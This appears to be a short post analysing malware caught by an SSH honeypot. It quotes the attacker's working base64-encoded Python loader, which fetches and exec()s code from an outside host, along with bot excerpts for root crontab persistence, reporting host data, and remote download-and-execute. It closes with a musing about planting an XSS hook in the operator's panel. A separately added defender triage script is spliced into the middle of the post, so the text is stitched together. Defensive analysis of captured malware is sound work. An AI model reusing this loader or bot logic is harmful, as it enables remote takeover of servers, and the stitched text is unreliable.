another nice ssh honeypot-catch:
uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2>&1 &
That downloads a complete, base64-encoded Python program from http://k.zsw8.cc/Api/ and exec()s it.
In that program a crontab entry is added for persistence:
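A defender's static triage of the captured one-liner, added here as an example (not code from the post or from the malware): it pulls the base64 argument out of the command line, decodes the stage without running it, and extracts the C2 URL, beacon interval and the exec-of-downloaded-content pattern. The captured command is the one quoted above; the indicator names are my own.

```python
"""Static triage of a captured "python -c ... b64decode('...')" one-liner.
Nothing here executes the attacker's code: the stage is decoded as text and
searched for indicators a defender wants to record."""
import base64
import re

# Captured attacker command line from the honeypot catch quoted above.
CAPTURED = (
    'nohup python -c "import base64;exec(base64.b64decode(\''
    "I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6"
    "CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNj"
    "L0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAg"
    "IHRpbWUuc2xlZXAoMzAwKQ=="
    "'))\" > /dev/null 2>&1 &"
)

# The quoted literal handed to base64.b64decode(); whitespace is allowed inside
# because long blobs are often line-wrapped in logs and pastes.
B64_ARG = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
SLEEP_RE = re.compile(r"sleep\(\s*(\d+)\s*\)")


def extract_stage(cmdline):
    """Return the decoded stage as text, or None if no b64decode('...') literal is present."""
    m = B64_ARG.search(cmdline)
    if not m:
        return None
    blob = re.sub(r"\s+", "", m.group(1))  # undo line-wrap damage before decoding
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def triage(cmdline):
    """Summarise the indicators of a captured command line, or None if it carries no stage."""
    stage = extract_stage(cmdline)
    if stage is None:
        return None
    return {
        # Where the next stage is fetched from: the C2 / "herder" URL(s).
        "urls": sorted(set(URL_RE.findall(stage))),
        # Downloaded content is passed straight to exec(): a remote-code loader.
        "execs_remote": "urlopen(" in stage and re.search(r"exec\(", stage) is not None,
        # Beacon interval(s) in seconds, taken from sleep() calls.
        "beacon_seconds": [int(s) for s in SLEEP_RE.findall(stage)],
        "persistent_loop": "while True" in stage,
        # nohup ... & : detached from the SSH session so it survives logout.
        "background": cmdline.lstrip().startswith("nohup") and cmdline.rstrip().endswith("&"),
    }
```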
    if runCodePath not in crontabData:
        f = open("/etc/crontab", "a+")
        f.write("\n0 */6 * * * root %s\n" % runCodePath)
then it uploads data about the hacked server to the herder:
    my_data = {"key": d.get_key, "name": d.get_name, "os": d.get_platform, "core": d.get_core,
               "cpu": d.get_cpucount, "cpuuse": d.get_cpuuse, "status": d.get_status}
    f = urllib.urlopen(apiURL, urllib.urlencode(my_data))
and waits for commands:
    if data.has_key("download") and data["download"]:
        DownExec(data["download"], task_id)
    if data.has_key("cmd") and data["cmd"]:
        CmdExec(data["cmd"], task_id)
I wonder what would happen if the computer name were a BeEF XSS hook or something..?